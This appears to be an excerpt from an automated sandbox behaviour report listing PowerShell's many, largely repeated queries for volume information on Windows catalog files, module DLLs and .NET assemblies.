        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
